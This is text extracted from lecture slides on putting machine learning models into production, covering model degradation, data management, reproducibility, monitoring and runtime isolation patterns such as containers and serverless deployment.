In the context of ML productionization, many of these are hard to apply
ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models-degrade-in-production- d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline-understanding-model-degradation-machine-learning- models, https://mlinproduction.com/model-retraining/) Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…) Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time A solid model governance infrastructure is key! AIops, MLops
104 Common deployment issues
Many of these issues are well known in traditional software engineering
https://www.tecton.ai/blog/devops-ml-data/
In stark contrast to software engineering, data science doesn’t have a well-defined, fully “ “ automated process to get into production quickly.
105 Deployment platforms
Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner flow, Spotify’s Luigi and Airbnb’s Airflow, Netflix’ ML Platform, Airbnb’s Bighead
106 Deployment principles
(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns
107 (Meta)Data management
The issue: during model-development, data sources are typically dispersed and entangled, it is hard to keep track of the data used during a model’s construction. Definitions are not clear are unavailable
A common source of data should be set up and used both during model development and in production Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines Don’t split up the data layer in “raw”, “processed” and “final” stages: data is always raw and never final, focus instead on integrating the different sources in a common platform When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer Consider for every data input whether the data will be available at prediction-time in a timely manner Set up a structured data dictionary containing data definitions and metadata information. This includes data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements to be used if not possible Both data and metadata come with versioning: keep historical records available. I.e. you should be able to retrieve the state of the data as when it was during training. This applies to streaming data as well: typically retained in a historical repository as well to be used when (re)training or using models Make sure that predictions of models are ingested in the data layer, if they are to be used as an input for other models 108 Train-run integration: reproducibility and testing
The issue: it is hard to re-train an (outdated model), code used during development is in a separate environment and of lower quality than the code that gets deployed in the production environment
Aim for a reproducible pipeline: the resulting artifact of training code should be directly deployable in production Keep track of each “build” of the model to allow for versioning This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream: e.g. when using Kafka, Apache Pulsar, Spark Streams) After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions. Report errors whilst building and running the model Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, Tensorflow, …), but do allow for flexibility (e.g. using Python libraries) within a well-defined context Isolate the runtime environment per model Allow for an updated model to “run silently” along with the current version so you’re free to test the model for a while and analyze its results (“Canary” or “shadow” deployment) Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end-users and integrators Same for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables 109 Monitoring, logging and alerting
The issue: models fail silently, their accuracy decrease over time, changing data definitions might still lead to models using those data elements suddenly failing
See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML Test Score? A rubric for ML production systems, set up a common monitoring and logging platform Keep track of inputs provided to the model Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve? Keep track of model outputs as well over time Does the probability distribution of the model change over time? Does usage decrease? Do predictions fail? How long does it take to call the model? Repeated backtesting of repeat control experiments are even better, but harder
110 Monitoring, logging and alerting
https://zenml.io/why-ZenML/
https://www.monalabs.io/
111 Monitoring, logging and alerting
https://evidentlyai.com/ 112 Runtime patterns
The issue: where do models run? How will they be exposed in the organization?
Two common patterns: Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being save to the data layer, e.g. to Hadoop, an FTP server, a relational database table, an Excel file Pull: the model is deployed as an API or microservice to be queried by outside consumers … to be used by web apps, mobile apps, BI dashboards, reports… In both cases, an isolated runtime environment need to be provided!
113 Runtime patterns
Isolated runtime environments
Each deployed version of a model comes with its own environment E.g. Python version, packages used and their version, other supporting executables and libraries Different levels of isolation are possible Environment isolation: e.g. using Python virtual environments, Anaconda environments (e.g. each model runs in its own Anaconda environment) Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (e.g. each model runs in its own Docker container above a shared OS layer) Virtualization: full OS stack is isolated on top of a hardware emulation layer Serverless: models are deployed using e.g. Amazon Lambda, Azure Functions, Google Cloud Functions Typically combined with data layers in the cloud as well Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting
114 Closing
Trade-off between flexibility and robustness: allowing for experimentation for ad-hoc, new or experimental projects is still fine
Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks
Not all models end as an API
In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?
115